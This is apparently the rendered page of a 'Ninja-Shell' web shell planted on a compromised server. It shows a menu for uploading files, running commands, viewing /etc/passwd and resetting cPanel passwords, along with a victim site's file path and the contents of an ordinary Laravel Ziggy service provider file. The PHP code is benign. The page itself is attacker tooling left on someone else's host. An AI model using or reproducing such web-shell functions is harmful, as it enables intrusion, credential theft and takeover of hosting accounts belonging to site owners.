{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//arsu_theme/vendor/tightenco/ziggy/src/ZiggyServiceProvider.php
<?php namespace Tighten\Ziggy; use Illuminate\Support\Facades\Event; use Illuminate\Support\ServiceProvider; use Illuminate\View\Compilers\BladeCompiler; use Laravel\Octane\Events\RequestReceived; class ZiggyServiceProvider extends ServiceProvider { public function boot(): void { if ($this->app->resolved('blade.compiler')) { $this->registerDirective($this->app['blade.compiler']); } else { $this->app->afterResolving('blade.compiler', $this->registerDirective(...)); } Event::listen(RequestReceived::class, function () { BladeRouteGenerator::$generated = false; }); if ($this->app->runningInConsole()) { $this->commands(CommandRouteGenerator::class); } } protected function registerDirective(BladeCompiler $blade): void { $blade->directive('routes', fn ($group) => "<?php echo app('" . BladeRouteGenerator::class . "')->generate({$group}); ?>"); } }
./Ninja\.